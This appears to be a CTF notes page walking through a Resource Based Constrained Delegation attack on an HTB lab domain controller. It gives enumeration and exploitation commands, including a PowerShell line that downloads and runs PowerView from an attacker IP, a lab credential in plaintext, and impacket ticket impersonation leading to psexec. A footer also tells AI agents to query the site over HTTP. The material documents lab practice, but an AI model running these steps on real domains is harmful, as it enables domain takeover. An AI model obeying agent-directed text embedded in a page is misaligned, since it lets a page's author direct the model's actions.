# Resource Based Constrained Delegation {% embed url="" %} In a nutshell, through a Resource Based Constrained Delegation attack we can add a computer under our control to the domain. The attack relies on three prerequisites: * We need a shell or code execution as a domain user that belongs to the Authenticated Users group. By default any member of this group can add up to 10 computers to the domain. * The ms-ds-machineaccountquota attribute needs to be higher than 0. This attribute controls the amount of computers that authenticated domain users can add to the domain. * A user or a group is a member of, needs to have WRITE privileges ( GenericAll , WriteDACL) over a domain joined computer (in this case the Domain Controller)

## Linux based Attack Commands ### Enumeration {% code overflow="wrap" %} ```bash # Check if MS-ds-machineaccountquota has more than 0 # If the output of the command below shows that this attribute is set to 10, this means each authenticated domain user can add up to 10 computers to the domain. PS> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota # Verify that the msds-allowedtoactonbehalfofotheridentity attribute is empty. PS> iex (new-Object Net.WebClient).DownloadString('http://10.10.14.36/privesc/PowerView.ps1')|Import-Module PowerView.ps1 PS> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity # The following output shows that the value is empty. Now it is ready to attack. ``` {% endcode %}

### Exploitation 1. **Download the tool.** 2. **Creating a fake computer** {% code overflow="wrap" %} ```bash # Kali addcomputer.py -computer-name 'EVILCOM$' -computer-pass password -dc-ip $RHOST support/support:Ironside47pleasure40Watchful ``` {% endcode %}

3. **Modifying delegation rights** Implemented the script [rbcd.py](https://github.com/tothi/rbcd-attack/blob/master/rbcd.py) found here in the repo which adds the related security descriptor of the newly created EVILCOMPUTER to the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target computer. {% code overflow="wrap" %} ```bash # Use the rbcd.py downloaded above ./rbcd.py -f EVILCOM -t DC -dc-ip $RHOST support\\support:Ironside47pleasure40Watchful ``` {% endcode %}

4. Getting Impersonated Service Ticket {% code overflow="wrap" %} ```bash # Kali impacket-getST -spn cifs/DC.support.htb -impersonate Administrator -dc-ip $RHOST support/EVILCOM$:password ``` {% endcode %}

5. Injecting Ticket into memory ```bash # Kali export KRB5CCNAME=./Administrator.ccache Klist ```

6. Running PSEXEC command. {% code overflow="wrap" %} ```bash # Kali impacket-psexec -k DC.support.htb ``` {% endcode %}

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/active-directory/acl-abuse/resource-based-constrained-delegation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.